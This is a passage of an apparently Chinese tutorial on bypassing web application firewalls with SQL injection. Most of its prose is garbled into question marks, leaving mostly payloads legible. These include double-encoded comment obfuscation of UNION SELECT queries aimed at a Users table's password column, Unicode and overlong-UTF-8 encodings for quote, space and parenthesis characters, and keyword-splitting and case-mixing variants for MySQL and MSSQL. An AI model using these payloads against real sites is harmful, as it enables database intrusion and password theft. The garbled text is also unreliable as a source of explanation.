????6>Character????
??????Щ????£?WAF????ó????е???????н?????????ЩWAF????????????ε?????????????bypass???????????????????????(WAF??????????????????SQL???????????????????~)
??????????bypass????????
????id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1??2??password%252f%252a*/FROM%252f%252a*/Users--+
?????Щ???????????
???????????'

 

%u0027
%u02b9
%u02bc
%u02c8
%u2032
%uff07
%c0%27
%c0%a7
%e0%80%a7
????
%u0020
%uff00
%c0%20
%c0%a0
%e0%80%a0
??????(:
%u0028
%uff08
%c0%28
%c0%a8
%e0%80%a8
??????):
%u0029
%uff09
%c0%29
%c0%a9
%e0%80%a9

????7>????
???????????????WAF???????????????????????~???????????????????????WAF??
????7a>???SQL???
?????????????????????SQL??????????????????????????????????????磬????????????union+select????????????403?????????????????union?????????????????????Щ???????????Fuzzing?????????????bypass???????
????7b>?????????
?????????sql???????????????????????????????????????????????php?и???????е?????????????aspx???????????????????????
????????????????????
????id=1+Select+1??2??3--
??????????????′???
????Error at line 1 near " "+1??2??3--
??????????????????????????????????????·???????????
????sel%0bect+1??2??3
????????????????????????WAF????????bypass?·??
????8>???bypass?????
????????????????????????????????WAF???????????????????????о??????????????????? :b  ??????????????????????WAF????????????????????????£????????????????????????????????????????????????????????Щ??????????inflatable doll?? [;:{}()*&$/|<>?"'] ???????????Щ?????????????????????~???????????????????????????????????
??????????????????N???????tm??????????????????????????????????????????????????????С???????????????WAF???????????copy????????????????????????????????????£???????????
?????????????????????????????????е?*???????????????ζ???????????????????union+select???????????403??????????????£?????ó??????*???滻?????
????id=1+uni*on+sel*ect+1??2??3--+
?????????????*??????????????union+select??????????????????????WAF bypass????????????????union+select??????????????????????????????????????滻????????????????????????????
?????Щ??????bypass??
????id=1+(UnIoN)+(SelECT)+
????id=1+(UnIoN+SeLeCT)+
????id=1+(UnI)(oN)+(SeL)(EcT)
????id=1+'UnI''On'+'SeL''ECT' <-MySQL only
????id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
?????????mysql4.0???UNI /**/ON+SEL/**/ ECT?????????
????????WAF??????????????????????????о???WAF bypass????????????????????????????????????pm???